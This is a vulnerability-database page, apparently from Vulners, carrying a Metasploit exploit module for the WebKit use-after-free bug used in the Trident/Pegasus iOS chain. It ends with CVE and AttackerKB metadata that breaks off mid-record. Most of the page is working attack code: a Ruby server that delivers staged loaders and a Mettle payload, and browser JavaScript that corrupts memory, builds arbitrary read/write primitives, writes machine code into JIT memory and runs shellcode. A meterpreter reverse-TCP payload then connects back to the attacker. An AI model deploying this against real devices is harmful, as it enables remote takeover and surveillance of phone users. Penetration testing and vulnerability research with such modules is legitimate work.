Search...

WebKit not_number defineProperties UAF

2018-04-03T06:44:54

ID MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_TRIDENT
Type metasploit
Reporter Rapid7
Modified 2020-10-02T20:00:37

Description

This module exploits a UAF vulnerability in WebKit's JavaScriptCore library.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule &lt; Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           =&gt; 'WebKit not_number defineProperties UAF',
      'Description'    =&gt; %q{
          This module exploits a UAF vulnerability in WebKit's JavaScriptCore library.
      },
      'License'        =&gt; MSF_LICENSE,
      'Author'         =&gt; [
        'qwertyoruiop', # jbme.qwertyoruiop.com
        'siguza',       # PhoenixNonce
        'tihmstar',     # PhoenixNonce
        'benjamin-42',  # Trident
        'timwr',        # metasploit integration
        ],
      'References'     =&gt; [
          ['CVE', '2016-4655'],
          ['CVE', '2016-4656'],
          ['CVE', '2016-4657'],
          ['BID', '92651'],
          ['BID', '92652'],
          ['BID', '92653'],
          ['URL', 'https://blog.lookout.com/trident-pegasus'],
          ['URL', 'https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/'],
          ['URL', 'https://www.blackhat.com/docs/eu-16/materials/eu-16-Bazaliy-Mobile-Espionage-in-the-Wild-Pegasus-and-Nation-State-Level-Attacks.pdf'],
          ['URL', 'https://github.com/Siguza/PhoenixNonce'],
          ['URL', 'https://jndok.github.io/2016/10/04/pegasus-writeup/'],
          ['URL', 'https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html'],
          ['URL', 'https://github.com/benjamin-42/Trident'],
          ['URL', 'http://blog.tihmstar.net/2018/01/modern-post-exploitation-techniques.html'],
        ],
      'Arch'           =&gt; ARCH_AARCH64,
      'Platform'       =&gt; 'apple_ios',
      'DefaultTarget'  =&gt; 0,
      'DefaultOptions' =&gt; { 'PAYLOAD' =&gt; 'apple_ios/aarch64/meterpreter_reverse_tcp' },
      'Targets'        =&gt; [[ 'Automatic', {} ]],
      'DisclosureDate' =&gt; '2016-08-25'))
    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]),
        OptString.new('URIPATH', [ true, "The URI to use for this exploit.", "/" ])
      ])
  end

  def payload_url
    "tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}"
  end

  def on_request_uri(cli, request)
    print_status("Request from #{request['User-Agent']}")
    if request.uri =~ %r{/loader32$}
      print_good("armle target is vulnerable.")
      local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit32" )
      loader_data = File.read(local_file, {:mode =&gt; 'rb'})
      srvhost = Rex::Socket.resolv_nbo_i(srvhost_addr)
      config = [srvhost, srvport].pack("Nn") + payload_url
      payload_url_index = loader_data.index('PAYLOAD_URL')
      loader_data[payload_url_index, config.length] = config
      send_response(cli, loader_data, {'Content-Type'=&gt;'application/octet-stream'})
      return
    elsif request.uri =~ %r{/loader64$}
      print_good("aarch64 target is vulnerable.")
      local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "loader" )
      loader_data = File.read(local_file, {:mode =&gt; 'rb'})
      send_response(cli, loader_data, {'Content-Type'=&gt;'application/octet-stream'})
      return
    elsif request.uri =~ %r{/exploit64$}
      local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit" )
      loader_data = File.read(local_file, {:mode =&gt; 'rb'})
      payload_url_index = loader_data.index('PAYLOAD_URL')
      loader_data[payload_url_index, payload_url.length] = payload_url
      send_response(cli, loader_data, {'Content-Type'=&gt;'application/octet-stream'})
      print_status("Sent exploit (#{loader_data.size} bytes)")
      return
    elsif request.uri =~ %r{/payload32$}
      payload_data = MetasploitPayloads::Mettle.new('arm-iphone-darwin').to_binary :dylib_sha1
      send_response(cli, payload_data, {'Content-Type'=&gt;'application/octet-stream'})
      print_status("Sent payload (#{payload_data.size} bytes)")
      return
    end
    html = %Q^
&lt;html&gt;
&lt;body&gt;
&lt;script&gt;

function load_binary_resource(url) {
  var req = new XMLHttpRequest();
  req.open('GET', url, false);
  req.overrideMimeType('text/plain; charset=x-user-defined');
  req.send(null);
  return req.responseText;
}

var pressure = new Array(400);
var bufs = new Array(10000);

var fcp = 0;
var smsh = new Uint32Array(0x10);

var trycatch = "";
for(var z=0; z&lt;0x4000; z++) trycatch += "try{} catch(e){}; ";
var fc = new Function(trycatch);

function dgc() {
  for (var i = 0; i &lt; pressure.length; i++) {
    pressure[i] = new Uint32Array(0xa000);
  }
  for (var i = 0; i &lt; pressure.length; i++) {
    pressure[i] = 0;
  }
}

function swag() {
  if(bufs[0]) return;

  dgc();

  for (i=0; i &lt; bufs.length; i++) {
    bufs[i] = new Uint32Array(0x100*2)
    for (k=0; k &lt; bufs[i].length; )
    {
      bufs[i][k++] = 0x41414141;
      bufs[i][k++] = 0xffff0000;
    }
  }
}

var mem0=0;
var mem1=0;
var mem2=0;

function read4(addr) {
  mem0[4] = addr;
  var ret = mem2[0];
  mem0[4] = mem1;
  return ret;
}

function write4(addr, val) {
  mem0[4] = addr;
  mem2[0] = val;
  mem0[4] = mem1;
}

_dview = null;
function u2d(low, hi) {
  if (!_dview) _dview = new DataView(new ArrayBuffer(16));
  _dview.setUint32(0, hi);
  _dview.setUint32(4, low);
  return _dview.getFloat64(0);
}

function go_(){
  var arr = new Array(0x100);
  var not_number = {};
  not_number.toString = function() {
    arr = null;
    props["stale"]["value"] = null;
    swag();
    return 10;
  };

  smsh[0] = 0x21212121;
  smsh[1] = 0x31313131;
  smsh[2] = 0x41414141;
  smsh[3] = 0x51515151;
  smsh[4] = 0x61616161;
  smsh[5] = 0x71717171;
  smsh[6] = 0x81818181;
  smsh[7] = 0x91919191;

  var props = {
    p0 : { value : 0 },
    p1 : { value : 1 },
    p2 : { value : 2 },
    p3 : { value : 3 },
    p4 : { value : 4 },
    p5 : { value : 5 },
    p6 : { value : 6 },
    p7 : { value : 7 },
    p8 : { value : 8 },
    length : { value : not_number },
    stale : { value : arr },
    after : { value : 666 }
  };

  var target = [];
  var stale = 0;
  Object.defineProperties(target, props);
  stale = target.stale;

  if (stale.length != 0x41414141){
    location.reload();
    return;
  }

  var obuf = new Uint32Array(2);
  obuf[0] = 0x41414141;
  obuf[1] = 0xffff0000;

  stale[0] = 0x12345678;
  stale[1] = {};

  for(var z=0; z&lt;0x100; z++) fc();

  for (i=0; i &lt; bufs.length; i++) {
    var dobreak = 0;
    for (k=0; k &lt; bufs[0].length; k++) {
      if (bufs[i][k] == 0x12345678) {
        if (bufs[i][k+1] == 0xFFFF0000) {
          stale[0] = fc;
          fcp = bufs[i][k];
          stale[0] = {
            'a': u2d(105, 0),
            'b': u2d(0, 0),
            'c': smsh,
            'd': u2d(0x100, 0)
          }
          stale[1] = stale[0];
          bufs[i][k] += 0x10;
          bck = stale[0][4];
          stale[0][4] = 0;
          stale[0][6] = 0xffffffff;
          mem0 = stale[0];
          mem1 = bck;
          mem2 = smsh;
          bufs.push(stale);
          if (smsh.length != 0x10) {
            var filestream = load_binary_resource("loader64");
            var macho = load_binary_resource("exploit64");
            r2 = smsh[(fcp+0x18)/4];
            r3 = smsh[(r2+0x10)/4];
            var jitf = smsh[(r3+0x10)/4];
            write4(jitf, 0xd28024d0);     //movz x16, 0x126
            write4(jitf + 4, 0x58000060);   //ldr x0, 0x100007ee4
            write4(jitf + 8, 0xd4001001);   //svc 80
            write4(jitf + 12, 0xd65f03c0);  //ret
            write4(jitf + 16, jitf + 0x20);
            write4(jitf + 20, 1);
            fc();
            var dyncache = read4(jitf + 0x20);
            var dyncachev = read4(jitf + 0x20);
            var go = 1;
            while (go) {
              if (read4(dyncache) == 0xfeedfacf) {
                for (i = 0; i &lt; 0x1000 / 4; i++) {
                  if (read4(dyncache + i * 4) == 0xd && read4(dyncache + i * 4 + 1 * 4) == 0x40 && read4(dyncache + i * 4 + 2 * 4) == 0x18 && read4(dyncache + i * 4 + 11 * 4) == 0x61707369) // lulziest mach-o parser ever
                  {
                    go = 0;
                    break;
                  }
                }
              }
              dyncache += 0x1000;
            }
            dyncache -= 0x1000;
            var bss = [];
            var bss_size = [];
            for (i = 0; i &lt; 0x1000 / 4; i++) {
              if (read4(dyncache + i * 4) == 0x73625f5f && read4(dyncache + i * 4 + 4) == 0x73) {
                bss.push(read4(dyncache + i * 4 + (0x20)) + dyncachev - 0x80000000);
                bss_size.push(read4(dyncache + i * 4 + (0x28)));
              }
            }
            var shc = jitf;
            for (var i = 0; i &lt; filestream.length;) {
              var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) &lt;&lt; 8) | ((filestream.charCodeAt(i + 2) & 0xff) &lt;&lt; 16) | ((filestream.charCodeAt(i + 3) & 0xff) &lt;&lt; 24);
              write4(shc, word);
              shc += 4;
              i += 4;
            }
            jitf &= ~0x3FFF;
            jitf += 0x8000;
            write4(shc, jitf);
            write4(shc + 4, 1);
            // copy macho
            for (var i = 0; i &lt; macho.length;i+=4) {
              var word = (macho.charCodeAt(i) & 0xff) | ((macho.charCodeAt(i + 1) & 0xff) &lt;&lt; 8) | ((macho.charCodeAt(i + 2) & 0xff) &lt;&lt; 16) | ((macho.charCodeAt(i + 3) & 0xff) &lt;&lt; 24);
              write4(jitf+i, word);
            }
            for (var i = 0; i &lt; bss.length; i++) {
              for (k = bss_size[i] / 6; k &lt; bss_size[i] / 4; k++) {
                write4(bss[i] + k * 4, 0);
              }
            }
            fc();
          }
        } else if(bufs[i][k+1] == 0xFFFFFFFF) {
          stale[0] = fc;
          fcp = bufs[i][k];
          stale[0] = smsh;
          stale[2] = {'a':u2d(0x2,0x10),'b':smsh, 'c':u2d(0,0), 'd':u2d(0,0)}
          stale[0] = {'a':u2d(0,0x00e00600),'b':u2d(1,0x10), 'c':u2d(bufs[i][k+2*2]+0x10,0), 'd':u2d(0,0)}
          stale[1] = stale[0];
          bufs[i][k] += 0x10;
          var leak = stale[0][0].charCodeAt(0);
          leak += stale[0][1].charCodeAt(0) &lt;&lt; 8;
          leak += stale[0][2].charCodeAt(0) &lt;&lt; 16;
          leak += stale[0][3].charCodeAt(0) &lt;&lt; 24;
          bufs[i][k] -= 0x10;
          stale[0] = {'a':u2d(leak,0x00602300), 'b':u2d(0,0), 'c':smsh, 'd':u2d(0,0)}
          stale[1] = stale[0];
          bufs[i][k] += 0x10;
          stale[0][4] = 0;
          stale[0][5] = 0xffffffff;
          bufs[i][k] -= 0x10;
          mem0 = stale[0];
          mem2 = smsh;
          if (smsh.length != 0x10) {
            setTimeout(function() {
              var filestream = load_binary_resource("loader32");
              r2 = smsh[(fcp+0x14)/4];
              r3 = smsh[(r2+0x10)/4];
              shellcode = (smsh[(r3+0x14)/4]&0xfffff000)-0x10000;
              smsh[shellcode/4] = 0;
              shellcode += 4;
              smsh[shellcode/4] = 0;
              shellcode += 4;
              smsh[shellcode/4] = 0;
              shellcode += 4;
              smsh[shellcode/4] = 0;
              shellcode += 4;
              for(var i = 0; i &lt; filestream.length; i+=4) {
                var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i+1) & 0xff) &lt;&lt; 8)  | ((filestream.charCodeAt(i+2) & 0xff) &lt;&lt; 16)  | ((filestream.charCodeAt(i+3) & 0xff) &lt;&lt; 24);
                smsh[(shellcode+i)/4] = word;
              }
              smsh[(fcp+0x00)/4] = fcp+4;
              smsh[(fcp+0x04)/4] = fcp+4;
              smsh[(fcp+0x08)/4] = shellcode+1; //PC
              smsh[(fcp+0x30)/4] = fcp+0x30+4-0x18-0x34+0x8;

              fc();
            }, 100);
          }
        } else {
          location.reload();
        }
        dobreak = 1;
        break;
      }
    }
    if (dobreak) break;
  }
  location.reload();
}

setTimeout(go_, 300);


&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
    ^
    send_response(cli, html, {'Content-Type'=&gt;'text/html'})
  end

end

JSON Vulners Source

Initial Source

{"id": "MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_TRIDENT", "type": "metasploit", "bulletinFamily": "exploit", "title": "WebKit not_number defineProperties UAF", "description": "This module exploits a UAF vulnerability in WebKit's JavaScriptCore library.\n", "published": "2018-04-03T06:44:54", "modified": "2020-10-02T20:00:37", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4655", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4656", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4657", "https://blog.lookout.com/trident-pegasus", "https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/", "https://www.blackhat.com/docs/eu-16/materials/eu-16-Bazaliy-Mobile-Espionage-in-the-Wild-Pegasus-and-Nation-State-Level-Attacks.pdf", "https://github.com/Siguza/PhoenixNonce", "https://jndok.github.io/2016/10/04/pegasus-writeup/", "https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html", "https://github.com/benjamin-42/Trident", "http://blog.tihmstar.net/2018/01/modern-post-exploitation-techniques.html"], "cvelist": ["CVE-2016-4655", "CVE-2016-4656", "CVE-2016-4657"], "lastseen": "2020-10-07T20:44:35", "viewCount": 97, "enchantments": {"score": {"value": 6.0, "vector": "NONE", "modified": "2020-10-07T20:44:35", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:0D83B9C0-ACFE-4648-9140-DDFBA1B8B9BB", "AKB:9A712E53-5BC8-4E38-AD83-D2AB31802A04"]}, {"type": "cve", "idList": ["CVE-2016-4657", "CVE-2016-4655", "CVE-2016-4656"]}, {"type": "seebug", "idList": ["SSV:92772"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148041"]}, {"type": "apple", "idList": ["APPLE:HT207131", "APPLE:HT207130", "APPLE:HT207107", "APPLE:HT207145"]}, {"type": "exploitdb", "idList": ["EDB-ID:44213", "EDB-ID:44836"]}, {"type": "zdt", "idList": ["1337DAY-ID-29911", "1337DAY-ID-30530"]}, {"type": "threatpost", "idList": ["THREATPOST:181538B86D17715A38771F0A83B343E9", "THREATPOST:60101DF624A979A9924003068B7994CC"]}, {"type": "nessus", "idList": ["MACOSX_SAFARI9_1_3.NASL", "MACOSX_SECUPD2016-005.NASL", "UBUNTU_USN-3166-1.NASL"]}, {"type": "thn", "idList": ["THN:32ED4C0A7FA3A0F0A9A708FC243A644D"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:6091475B7C3358E497093045025F72F1"]}, {"type": "myhack58", "idList": ["MYHACK58:62201789257"]}, {"type": "ubuntu", "idList": ["USN-3166-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310843008"]}], "modified": "2020-10-07T20:44:35", "rev": 2}, "vulnersScore": 6.0}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/apple_ios/browser/webkit_trident.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WebKit not_number defineProperties UAF',\n 'Description' => %q{\n This module exploits a UAF vulnerability in WebKit's JavaScriptCore library.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'qwertyoruiop', # jbme.qwertyoruiop.com\n 'siguza', # PhoenixNonce\n 'tihmstar', # PhoenixNonce\n 'benjamin-42', # Trident\n 'timwr', # metasploit integration\n ],\n 'References' => [\n ['CVE', '2016-4655'],\n ['CVE', '2016-4656'],\n ['CVE', '2016-4657'],\n ['BID', '92651'],\n ['BID', '92652'],\n ['BID', '92653'],\n ['URL', 'https://blog.lookout.com/trident-pegasus'],\n ['URL', 'https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/'],\n ['URL', 'https://www.blackhat.com/docs/eu-16/materials/eu-16-Bazaliy-Mobile-Espionage-in-the-Wild-Pegasus-and-Nation-State-Level-Attacks.pdf'],\n ['URL', 'https://github.com/Siguza/PhoenixNonce'],\n ['URL', 'https://jndok.github.io/2016/10/04/pegasus-writeup/'],\n ['URL', 'https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html'],\n ['URL', 'https://github.com/benjamin-42/Trident'],\n ['URL', 'http://blog.tihmstar.net/2018/01/modern-post-exploitation-techniques.html'],\n ],\n 'Arch' => ARCH_AARCH64,\n 'Platform' => 'apple_ios',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },\n 'Targets' => [[ 'Automatic', {} ]],\n 'DisclosureDate' => '2016-08-25'))\n register_options(\n [\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 8080 ]),\n OptString.new('URIPATH', [ true, \"The URI to use for this exploit.\", \"/\" ])\n ])\n end\n\n def payload_url\n \"tcp://#{datastore[\"LHOST\"]}:#{datastore[\"LPORT\"]}\"\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request from #{request['User-Agent']}\")\n if request.uri =~ %r{/loader32$}\n print_good(\"armle target is vulnerable.\")\n local_file = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2016-4655\", \"exploit32\" )\n loader_data = File.read(local_file, {:mode => 'rb'})\n srvhost = Rex::Socket.resolv_nbo_i(srvhost_addr)\n config = [srvhost, srvport].pack(\"Nn\") + payload_url\n payload_url_index = loader_data.index('PAYLOAD_URL')\n loader_data[payload_url_index, config.length] = config\n send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})\n return\n elsif request.uri =~ %r{/loader64$}\n print_good(\"aarch64 target is vulnerable.\")\n local_file = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2016-4655\", \"loader\" )\n loader_data = File.read(local_file, {:mode => 'rb'})\n send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})\n return\n elsif request.uri =~ %r{/exploit64$}\n local_file = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2016-4655\", \"exploit\" )\n loader_data = File.read(local_file, {:mode => 'rb'})\n payload_url_index = loader_data.index('PAYLOAD_URL')\n loader_data[payload_url_index, payload_url.length] = payload_url\n send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})\n print_status(\"Sent exploit (#{loader_data.size} bytes)\")\n return\n elsif request.uri =~ %r{/payload32$}\n payload_data = MetasploitPayloads::Mettle.new('arm-iphone-darwin').to_binary :dylib_sha1\n send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})\n print_status(\"Sent payload (#{payload_data.size} bytes)\")\n return\n end\n html = %Q^\n<html>\n<body>\n<script>\n\nfunction load_binary_resource(url) {\n var req = new XMLHttpRequest();\n req.open('GET', url, false);\n req.overrideMimeType('text/plain; charset=x-user-defined');\n req.send(null);\n return req.responseText;\n}\n\nvar pressure = new Array(400);\nvar bufs = new Array(10000);\n\nvar fcp = 0;\nvar smsh = new Uint32Array(0x10);\n\nvar trycatch = \"\";\nfor(var z=0; z<0x4000; z++) trycatch += \"try{} catch(e){}; \";\nvar fc = new Function(trycatch);\n\nfunction dgc() {\n for (var i = 0; i < pressure.length; i++) {\n pressure[i] = new Uint32Array(0xa000);\n }\n for (var i = 0; i < pressure.length; i++) {\n pressure[i] = 0;\n }\n}\n\nfunction swag() {\n if(bufs[0]) return;\n\n dgc();\n\n for (i=0; i < bufs.length; i++) {\n bufs[i] = new Uint32Array(0x100*2)\n for (k=0; k < bufs[i].length; )\n {\n bufs[i][k++] = 0x41414141;\n bufs[i][k++] = 0xffff0000;\n }\n }\n}\n\nvar mem0=0;\nvar mem1=0;\nvar mem2=0;\n\nfunction read4(addr) {\n mem0[4] = addr;\n var ret = mem2[0];\n mem0[4] = mem1;\n return ret;\n}\n\nfunction write4(addr, val) {\n mem0[4] = addr;\n mem2[0] = val;\n mem0[4] = mem1;\n}\n\n_dview = null;\nfunction u2d(low, hi) {\n if (!_dview) _dview = new DataView(new ArrayBuffer(16));\n _dview.setUint32(0, hi);\n _dview.setUint32(4, low);\n return _dview.getFloat64(0);\n}\n\nfunction go_(){\n var arr = new Array(0x100);\n var not_number = {};\n not_number.toString = function() {\n arr = null;\n props[\"stale\"][\"value\"] = null;\n swag();\n return 10;\n };\n\n smsh[0] = 0x21212121;\n smsh[1] = 0x31313131;\n smsh[2] = 0x41414141;\n smsh[3] = 0x51515151;\n smsh[4] = 0x61616161;\n smsh[5] = 0x71717171;\n smsh[6] = 0x81818181;\n smsh[7] = 0x91919191;\n\n var props = {\n p0 : { value : 0 },\n p1 : { value : 1 },\n p2 : { value : 2 },\n p3 : { value : 3 },\n p4 : { value : 4 },\n p5 : { value : 5 },\n p6 : { value : 6 },\n p7 : { value : 7 },\n p8 : { value : 8 },\n length : { value : not_number },\n stale : { value : arr },\n after : { value : 666 }\n };\n\n var target = [];\n var stale = 0;\n Object.defineProperties(target, props);\n stale = target.stale;\n\n if (stale.length != 0x41414141){\n location.reload();\n return;\n }\n\n var obuf = new Uint32Array(2);\n obuf[0] = 0x41414141;\n obuf[1] = 0xffff0000;\n\n stale[0] = 0x12345678;\n stale[1] = {};\n\n for(var z=0; z<0x100; z++) fc();\n\n for (i=0; i < bufs.length; i++) {\n var dobreak = 0;\n for (k=0; k < bufs[0].length; k++) {\n if (bufs[i][k] == 0x12345678) {\n if (bufs[i][k+1] == 0xFFFF0000) {\n stale[0] = fc;\n fcp = bufs[i][k];\n stale[0] = {\n 'a': u2d(105, 0),\n 'b': u2d(0, 0),\n 'c': smsh,\n 'd': u2d(0x100, 0)\n }\n stale[1] = stale[0];\n bufs[i][k] += 0x10;\n bck = stale[0][4];\n stale[0][4] = 0;\n stale[0][6] = 0xffffffff;\n mem0 = stale[0];\n mem1 = bck;\n mem2 = smsh;\n bufs.push(stale);\n if (smsh.length != 0x10) {\n var filestream = load_binary_resource(\"loader64\");\n var macho = load_binary_resource(\"exploit64\");\n r2 = smsh[(fcp+0x18)/4];\n r3 = smsh[(r2+0x10)/4];\n var jitf = smsh[(r3+0x10)/4];\n write4(jitf, 0xd28024d0); //movz x16, 0x126\n write4(jitf + 4, 0x58000060); //ldr x0, 0x100007ee4\n write4(jitf + 8, 0xd4001001); //svc 80\n write4(jitf + 12, 0xd65f03c0); //ret\n write4(jitf + 16, jitf + 0x20);\n write4(jitf + 20, 1);\n fc();\n var dyncache = read4(jitf + 0x20);\n var dyncachev = read4(jitf + 0x20);\n var go = 1;\n while (go) {\n if (read4(dyncache) == 0xfeedfacf) {\n for (i = 0; i < 0x1000 / 4; i++) {\n if (read4(dyncache + i * 4) == 0xd && read4(dyncache + i * 4 + 1 * 4) == 0x40 && read4(dyncache + i * 4 + 2 * 4) == 0x18 && read4(dyncache + i * 4 + 11 * 4) == 0x61707369) // lulziest mach-o parser ever\n {\n go = 0;\n break;\n }\n }\n }\n dyncache += 0x1000;\n }\n dyncache -= 0x1000;\n var bss = [];\n var bss_size = [];\n for (i = 0; i < 0x1000 / 4; i++) {\n if (read4(dyncache + i * 4) == 0x73625f5f && read4(dyncache + i * 4 + 4) == 0x73) {\n bss.push(read4(dyncache + i * 4 + (0x20)) + dyncachev - 0x80000000);\n bss_size.push(read4(dyncache + i * 4 + (0x28)));\n }\n }\n var shc = jitf;\n for (var i = 0; i < filestream.length;) {\n var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);\n write4(shc, word);\n shc += 4;\n i += 4;\n }\n jitf &= ~0x3FFF;\n jitf += 0x8000;\n write4(shc, jitf);\n write4(shc + 4, 1);\n // copy macho\n for (var i = 0; i < macho.length;i+=4) {\n var word = (macho.charCodeAt(i) & 0xff) | ((macho.charCodeAt(i + 1) & 0xff) << 8) | ((macho.charCodeAt(i + 2) & 0xff) << 16) | ((macho.charCodeAt(i + 3) & 0xff) << 24);\n write4(jitf+i, word);\n }\n for (var i = 0; i < bss.length; i++) {\n for (k = bss_size[i] / 6; k < bss_size[i] / 4; k++) {\n write4(bss[i] + k * 4, 0);\n }\n }\n fc();\n }\n } else if(bufs[i][k+1] == 0xFFFFFFFF) {\n stale[0] = fc;\n fcp = bufs[i][k];\n stale[0] = smsh;\n stale[2] = {'a':u2d(0x2,0x10),'b':smsh, 'c':u2d(0,0), 'd':u2d(0,0)}\n stale[0] = {'a':u2d(0,0x00e00600),'b':u2d(1,0x10), 'c':u2d(bufs[i][k+2*2]+0x10,0), 'd':u2d(0,0)}\n stale[1] = stale[0];\n bufs[i][k] += 0x10;\n var leak = stale[0][0].charCodeAt(0);\n leak += stale[0][1].charCodeAt(0) << 8;\n leak += stale[0][2].charCodeAt(0) << 16;\n leak += stale[0][3].charCodeAt(0) << 24;\n bufs[i][k] -= 0x10;\n stale[0] = {'a':u2d(leak,0x00602300), 'b':u2d(0,0), 'c':smsh, 'd':u2d(0,0)}\n stale[1] = stale[0];\n bufs[i][k] += 0x10;\n stale[0][4] = 0;\n stale[0][5] = 0xffffffff;\n bufs[i][k] -= 0x10;\n mem0 = stale[0];\n mem2 = smsh;\n if (smsh.length != 0x10) {\n setTimeout(function() {\n var filestream = load_binary_resource(\"loader32\");\n r2 = smsh[(fcp+0x14)/4];\n r3 = smsh[(r2+0x10)/4];\n shellcode = (smsh[(r3+0x14)/4]&0xfffff000)-0x10000;\n smsh[shellcode/4] = 0;\n shellcode += 4;\n smsh[shellcode/4] = 0;\n shellcode += 4;\n smsh[shellcode/4] = 0;\n shellcode += 4;\n smsh[shellcode/4] = 0;\n shellcode += 4;\n for(var i = 0; i < filestream.length; i+=4) {\n var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i+1) & 0xff) << 8) | ((filestream.charCodeAt(i+2) & 0xff) << 16) | ((filestream.charCodeAt(i+3) & 0xff) << 24);\n smsh[(shellcode+i)/4] = word;\n }\n smsh[(fcp+0x00)/4] = fcp+4;\n smsh[(fcp+0x04)/4] = fcp+4;\n smsh[(fcp+0x08)/4] = shellcode+1; //PC\n smsh[(fcp+0x30)/4] = fcp+0x30+4-0x18-0x34+0x8;\n\n fc();\n }, 100);\n }\n } else {\n location.reload();\n }\n dobreak = 1;\n break;\n }\n }\n if (dobreak) break;\n }\n location.reload();\n}\n\nsetTimeout(go_, 300);\n\n\n</script>\n</body>\n</html>\n ^\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\n\nend\n", "metasploitReliability": "", "metasploitHistory": ""}

{"attackerkb": [{"lastseen": "2020-11-22T06:08:58", "bulletinFamily": "info", "cvelist": ["CVE-2016-4657"], "description": "WebKit in Apple iOS before 9.3.5 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:19am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-07-30T00:00:00", "published": "2016-08-25T00:00:00", "id": "AKB:9A712E53-5BC8-4E38-AD83-D2AB31802A04", "href": "https://attackerkb.com/topics/YIVp12TTDw/cve-2016-4657", "type": "attackerkb", "title": "CVE-2016-4657", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-22T06:09:04", "bulletinFamily": "info", "cvelist": ["CVE-2016-4655"], "description": "The kernel in Apple iOS before 9.3.5 allows attackers to obtain sensitive information from memory via a crafted app.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:18am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-07-30T00:00:00", "published": "2016-08-25T00:00:00", "id": "AKB:0D83B9C0-ACFE-4648-9140-DDFBA1B8B9BB", "href": "https://attackerkb.com/topics/TwC5z47HLn/cve-2016-4655", "type": "attackerkb", "title": "CVE-2016-4655", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:C/I:N/A:N"}}], "cve": [{"lastseen": "2020-12-09T20:07:39", "description": "WebKit in Apple iOS before 9.3.5 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-08-25T21:59:00", "title": "CVE-2016-4657", "type": "cve", "cwe": 